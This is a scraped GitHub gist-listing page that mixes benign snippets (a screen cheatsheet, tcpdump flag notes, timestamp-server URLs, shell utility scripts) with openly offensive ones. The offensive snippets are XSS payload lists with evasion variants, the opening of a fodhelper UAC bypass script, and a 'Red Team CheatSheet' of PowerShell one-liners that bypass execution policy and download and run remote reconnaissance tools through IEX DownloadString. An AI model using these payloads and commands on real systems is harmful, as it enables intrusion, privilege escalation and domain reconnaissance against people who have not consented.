Skip to content

Instantly share code, notes, and snippets.

View Darkcast's full-sized avatar

Darkcast

26 followers · 20 following
View GitHub Profile
@jctosta
jctosta / screen_cheatsheet.markdown
Last active May 1, 2024 16:11
Screen Cheatsheet

Screen Quick Reference

Basic

Description Command
Start a new session with session name screen -S <session_name>
List running sessions / screens screen -ls
Attach to a running session screen -x
Attach to a running session with name screen -r
@tuxfight3r
tuxfight3r / tcp_flags.txt
Last active April 17, 2024 14:48
tcpdump - reading tcp flags
##TCP FLAGS##
Unskilled Attackers Pester Real Security Folks
==============================================
TCPDUMP FLAGS
Unskilled = URG = (Not Displayed in Flag Field, Displayed elsewhere)
Attackers = ACK = (Not Displayed in Flag Field, Displayed elsewhere)
Pester = PSH = [P] (Push Data)
Real = RST = [R] (Reset Connection)
Security = SYN = [S] (Start Connection)
@sapran
sapran / Simple XSS payloads
Last active April 10, 2024 17:51 — forked from funkaoshi/XSS Strings
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@Manouchehri
Manouchehri / rfc3161.txt
Last active May 3, 2024 21:50
List of free rfc3161 servers.
https://rfc3161.ai.moda
https://rfc3161.ai.moda/adobe
https://rfc3161.ai.moda/microsoft
https://rfc3161.ai.moda/apple
https://rfc3161.ai.moda/any
http://rfc3161.ai.moda
http://timestamp.digicert.com
http://timestamp.globalsign.com/tsa/r6advanced1
http://rfc3161timestamp.globalsign.com/advanced
http://timestamp.sectigo.com
@mgeeky
mgeeky / mount-shared-folders.sh
Created March 13, 2017 11:58
VMware mount shared folders (taken from Kali)
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s
@kurobeats
kurobeats / xss_vectors.txt
Last active May 3, 2024 11:15
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active April 27, 2024 00:14
Bypass UAC via Fodhelper binary in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@curi0usJack
curi0usJack / .htaccess
Last active March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@xdavidhu
xdavidhu / converter.sh
Last active April 23, 2024 05:23
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
#!/bin/bash
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active February 24, 2024 16:36
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"